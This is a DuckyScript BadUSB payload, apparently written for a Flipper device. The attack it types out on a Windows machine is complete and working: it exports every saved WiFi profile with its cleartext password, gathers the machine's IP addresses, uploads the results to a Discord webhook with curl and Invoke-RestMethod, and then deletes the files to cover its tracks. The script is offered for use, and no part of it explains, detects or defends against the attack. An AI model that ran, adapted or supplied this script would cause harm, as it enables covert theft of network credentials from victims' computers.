REM Author: Cicada Unit
REM Description: This is a BadUSB script to grab WiFi passwords from Windows machine and submit to Discord WebHook via POST request.
REM Version:	1.0
REM Category:	Exfiltration
REM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM ~ This is a duckyscript to grab WiFi passwords from Windows machine and submit to Discord WebHook via POST request.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM ~ Tested on Windows 10 Professional ( with local administrator rights).~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM ~ (privilege escilation may be required before deploying--untested without admin perms).~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM ~ What the uniqueness about my script is, it will generate and .xml file containing the SSID of the target as well as wifi password of target.~~~
REM ~ The script also generate a txt file with a table containing the target ip address both manual and DHCP along with wifi password included.~~~~~~
REM ~ After it completes that in miliseconds it will compile both the .xml and .txt into one nice beautiful webhook POST.~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM ~ See included images for examples~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DELAY 500
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 500
STRING netsh wlan export profile key=clear
ENTER
DELAY 1000
ENTER
STRING powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > WiFi-PASS.txt
ENTER
DELAY 1000
STRING $url="<\Your Intended Discord WebHook URL/>"; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> WiFi-PASS.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> WiFi-PASS.txt;$Body=@{ content = "$env:computername Stats from Flipper"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url  -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@WiFi-PASS.txt" $url ; Remove-Item '.\WiFi-PASS.txt'; Remove-Item '.\Wi*.xml';
ENTER
STRING exit
ENTER
